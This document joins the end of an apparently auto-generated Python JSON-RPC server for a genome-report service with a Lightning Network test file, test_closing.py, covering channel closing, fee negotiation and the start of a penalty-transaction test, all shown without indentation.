xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
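# Example of the header handling above (assuming a reverse proxy in front of
# the service sets these headers): with
#     HTTP_X_FORWARDED_FOR = '203.0.113.5, 10.0.0.2'
# getIPAddress() returns '203.0.113.5', the left-most (client-facing) hop.
# If the config sets dont_trust_x_ip_headers to 'true', the X-* headers are
# ignored and REMOTE_ADDR is returned instead.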
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'Report_util_landml'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_Report_util_landml.assembly_metadata_report,
name='Report_util_landml.assembly_metadata_report',
types=[dict])
self.method_authentication['Report_util_landml.assembly_metadata_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.genome_report,
name='Report_util_landml.genome_report',
types=[dict])
self.method_authentication['Report_util_landml.genome_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.genomeset_report,
name='Report_util_landml.genomeset_report',
types=[dict])
self.method_authentication['Report_util_landml.genomeset_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.domain_report,
name='Report_util_landml.domain_report',
types=[dict])
self.method_authentication['Report_util_landml.domain_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.tree_report,
name='Report_util_landml.tree_report',
types=[dict])
self.method_authentication['Report_util_landml.tree_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.featseq_report,
name='Report_util_landml.featseq_report',
types=[dict])
self.method_authentication['Report_util_landml.featseq_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.protcomp_report,
name='Report_util_landml.protcomp_report',
types=[dict])
self.method_authentication['Report_util_landml.protcomp_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.status,
name='Report_util_landml.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'Report_util_landml ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single threaded python BaseHTTP service
# listening on port 9999 (the default), execute this file directly
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
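# Usage sketch (illustrative only; nothing below is executed by this module):
# run the server in a child process so that stop_server() can be called
# later, letting the OS pick a free port.
#
#     port = start_server(host='localhost', port=0, newprocess=True)
#     # ... issue JSON-RPC POST requests against http://localhost:<port> ...
#     stop_server()
#
# With newprocess=False (the default) the call blocks in serve_forever()
# until interrupted.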
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
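# The __main__ block below supports two modes; a hedged sketch of each
# invocation (the module file name is a placeholder, not part of this code):
#
#   # async job mode: read a JSON-RPC request from a file, write the response
#   python <this_server_module>.py input.json output.json [token_or_token_file]
#
#   # HTTP mode: serve with the single-threaded wsgiref server
#   python <this_server_module>.py --host=localhost --port=9999
#
# In async mode the exit code is 500 if the response contains an error and 0
# otherwise (see process_async_cli above).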
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
test_closing.py
from fixtures import * # noqa: F401,F403
from flaky import flaky
from pyln.client import RpcError, Millisatoshi
from shutil import copyfile
from pyln.testing.utils import SLOW_MACHINE
from utils import (
only_one, sync_blockheight, wait_for, TIMEOUT,
account_balance, first_channel_id, closing_fee, TEST_NETWORK,
scriptpubkey_addr, calc_lease_fee, EXPERIMENTAL_FEATURES
)
import os
import queue
import pytest
import re
import subprocess
import threading
import unittest
@pytest.mark.developer("Too slow without --dev-groestlcoind-poll")
def test_closing(node_factory, bitcoind, chainparams):
l1, l2 = node_factory.line_graph(2)
chan = l1.get_channel_scid(l2)
fee = closing_fee(3750, 2) if not chainparams['elements'] else 3603
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
]
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
l2.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
# The entry in the channels table should still be there
assert l1.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert l2.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
def test_closing_while_disconnected(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
fut = executor.submit(l1.rpc.close, chan, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
fut.result(TIMEOUT)
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(121)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_disconnected_notify(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l2.stop()
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
out = subprocess.check_output(['cli/lightning-cli',
'--network={}'.format(TEST_NETWORK),
'--lightning-dir={}'
.format(l1.daemon.lightning_dir),
'close',
l2.info['id'],
'5']).decode('utf-8').splitlines()
assert out[0] == '# peer is offline, will negotiate once they reconnect (5 seconds before unilateral close).'
assert out[1] == '# Timed out, forcing close.'
assert not any([line.startswith('#') for line in out[2:]])
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fundchannel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@pytest.mark.slow_test
def test_closing_torture(node_factory, executor, bitcoind):
# We set up a fully-connected mesh of N nodes, then try
# closing them all at once.
amount = 10**6
num_nodes = 10 # => 45 channels (36 seconds on my laptop)
if node_factory.valgrind:
num_nodes -= 4 # => 15 (135 seconds)
nodes = node_factory.get_nodes(num_nodes)
# Make sure bitcoind has plenty of utxos
bitcoind.generate_block(num_nodes)
# Give them all plenty of UTXOs, make sure they see them
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
addr = nodes[i].rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txs = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
nodes[i].rpc.connect(nodes[j].info['id'], 'localhost', nodes[j].port)
txs.append(nodes[i].rpc.fundchannel(nodes[j].info['id'], amount)['txid'])
# Make sure they're all in, then lock them in.
bitcoind.generate_block(1, wait_for_mempool=txs)
# Wait for them all to be CHANNELD_NORMAL
for n in nodes:
wait_for(lambda: all(p['channels'][0]['state'] == 'CHANNELD_NORMAL' for p in n.rpc.listpeers()['peers']))
# Start closers: can take a long time under valgrind!
futures = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
futures.append(executor.submit(nodes[i].rpc.close, nodes[j].info['id']))
futures.append(executor.submit(nodes[j].rpc.close, nodes[i].info['id']))
# Wait for close to finish
close_txs = set()
for f in futures:
# If one side completes closing, we'll get an error here 'Peer has no active channel'
try:
close_txs.add(f.result(TIMEOUT)['txid'])
except RpcError as err:
assert err.error['message'] == 'Peer has no active channel'
# Should have one close for each open.
assert len(close_txs) == len(txs)
# Get closes confirmed
bitcoind.generate_block(100, wait_for_mempool=list(close_txs))
# And make sure they hangup.
for n in nodes:
wait_for(lambda: n.rpc.listpeers()['peers'] == [])
@pytest.mark.slow_test
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/11000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 11000, 15000, 7400], [8000, 6000, 1001, 100]]
balance = [False, True]
num_peers = len(feerates) * len(balance)
addr = l1.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for b in balance:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
            p.balance = b
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.balance:
l1.pay(p, 100000000)
# Now close all channels (not unilaterally!)
closes = [executor.submit(l1.rpc.close, p.channel, 0) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'@WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'may_reconnect': True},
{'may_reconnect': True}])
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
l1.rpc.close(l2.info['id'])
l1.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
# Now verify that the closing tx is in the mempool.
bitcoind.generate_block(6, wait_for_mempool=1)
sync_blockheight(bitcoind, [l1, l2])
for n in [l1, l2]:
# Ensure we actually got a mutual close.
n.daemon.wait_for_log(r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_specified_destination(node_factory, bitcoind, chainparams):
l1, l2, l3, l4 = node_factory.get_nodes(4)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.rpc.connect(l4.info['id'], 'localhost', l4.port)
chan12, _ = l1.fundchannel(l2, 10**6)
chan13, _ = l1.fundchannel(l3, 10**6)
chan14, _ = l1.fundchannel(l4, 10**6)
l1.pay(l2, 100000000)
l1.pay(l3, 100000000)
l1.pay(l4, 100000000)
bitcoind.generate_block(5)
addr = chainparams['example_addr']
l1.rpc.close(chan12, None, addr)
l1.rpc.call('close', {'id': chan13, 'destination': addr})
l1.rpc.call('close', [chan14, None, addr])
l1.daemon.wait_for_logs([' to CLOSINGD_SIGEXCHANGE'] * 3)
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == 3)
# Now grab the close transaction
closetxs = {}
for i, n in enumerate([l2, l3, l4]):
billboard = only_one(l1.rpc.listpeers(n.info['id'])['peers'][0]['channels'])['status'][0]
m = re.search(r'CLOSINGD_SIGEXCHANGE.* tx:([a-f0-9]{64})', billboard)
closetxs[n] = m.group(1)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
    # l1 can't spend the output to addr.
for txid in closetxs.values():
assert not l1.daemon.is_in_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
# Check the txid has at least 1 confirmation
for n, txid in closetxs.items():
n.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
for n in [l2, l3, l4]:
# Make sure both nodes have grabbed their close tx funds
closetx = closetxs[n]
outputs = n.rpc.listfunds()['outputs']
assert closetx in set([o['txid'] for o in outputs])
output_num2 = [o for o in outputs if o['txid'] == closetx][0]['output']
output_num1 = 0 if output_num2 == 1 else 1
        # Check that the other address is addr
assert addr == scriptpubkey_addr(bitcoind.rpc.gettxout(closetx, output_num1)['scriptPubKey'])
assert 1 == bitcoind.rpc.gettxout(closetx, output_num1)['confirmations']
def closing_negotiation_step(node_factory, bitcoind, chainparams, opts):
def feerate_for(target, minimum=0, maximum=10000000):
"""Binary search to find feerate"""
assert minimum != maximum
mid = (minimum + maximum) // 2
mid_fee = closing_fee(mid, 1)
if mid_fee > target:
return feerate_for(target, minimum, mid)
elif mid_fee < target:
return feerate_for(target, mid, maximum)
else:
return mid
orate = feerate_for(21000) # closing fee negotiation starts at 21000
prate = feerate_for(20000) # closing fee negotiation starts at 20000
opener, peer = node_factory.line_graph(2, opts=[{'feerates': (orate, orate, orate, orate)},
{'feerates': (prate, prate, prate, prate)}])
opener_id = opener.info['id']
peer_id = peer.info['id']
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
if opts['close_initiated_by'] == 'opener':
opener.rpc.close(peer_id=peer_id, fee_negotiation_step=opts['fee_negotiation_step'])
else:
assert opts['close_initiated_by'] == 'peer'
peer.rpc.close(peer_id=opener_id, fee_negotiation_step=opts['fee_negotiation_step'])
# Get the proclaimed closing fee from the two nodes' statuses
status_agreed_regex = re.compile("agreed on a closing fee of ([0-9]+) satoshi")
# [fee_from_opener_status, fee_from_peer_status]
fees_from_status = [None, None]
def get_fee_from_status(node, peer_id, i):
nonlocal fees_from_status
peer = only_one(node.rpc.listpeers(peer_id)['peers'])
channel = only_one(peer['channels'])
status = channel['status'][0]
m = status_agreed_regex.search(status)
if not m:
return False
fees_from_status[i] = int(m.group(1))
return True
wait_for(lambda: get_fee_from_status(opener, peer_id, 0))
wait_for(lambda: get_fee_from_status(peer, opener_id, 1))
assert opts['expected_close_fee'] == fees_from_status[0]
assert opts['expected_close_fee'] == fees_from_status[1]
# Get the closing transaction from the bitcoind mempool and get its fee
mempool = None
mempool_tx_ids = None
def get_mempool_when_size_1():
nonlocal mempool, mempool_tx_ids
mempool = bitcoind.rpc.getrawmempool(True)
mempool_tx_ids = list(mempool.keys())
return len(mempool_tx_ids) == 1
wait_for(get_mempool_when_size_1)
close_tx_id = mempool_tx_ids[0]
fee_mempool = round(mempool[close_tx_id]['fee'] * 10**8)
assert opts['expected_close_fee'] == fee_mempool
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_30pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 30%"""
opts = {}
opts['fee_negotiation_step'] = '30%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20537 if not chainparams['elements'] else 26046
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20233 if not chainparams['elements'] else 25657
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_100pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 100%"""
opts = {}
opts['fee_negotiation_step'] = '100%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20001 if not chainparams['elements'] else 25366
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
# The close fee of 20499 looks strange in this case - one would expect
# to have a number close to 21000. This is because
# * the range is initially set to [20000 (peer), 21000 (opener)]
# * the opener is always first to propose, he uses 50% step, so he proposes 20500
# * the range is narrowed to [20001, 20499] and the peer proposes 20499
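    # Worked arithmetic for the narrowing above (illustrative only, not part
    # of the test):
    #   initial range:            [20000 (peer), 21000 (opener)]
    #   opener's first proposal:  (20000 + 21000) // 2 = 20500   (a 50% step)
    #   narrowed range:           [20001, 20499]
    #   peer's 100% step spans the whole remaining range, landing on 20499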
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499 if not chainparams['elements'] else 25998
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_1sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 1sat"""
opts = {}
opts['fee_negotiation_step'] = '1'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20989 if not chainparams['elements'] else 26624
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20010 if not chainparams['elements'] else 25373
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_700sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 700sat"""
opts = {}
opts['fee_negotiation_step'] = '700'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20151 if not chainparams['elements'] else 25650
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499 if not chainparams['elements'] else 25998
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@pytest.mark.developer("needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an incoming HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': ['=WIRE_COMMITMENT_SIGNED-nocommit'],
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'disconnect': ['=WIRE_COMMITMENT_SIGNED-nocommit'],
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('got commitsig')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
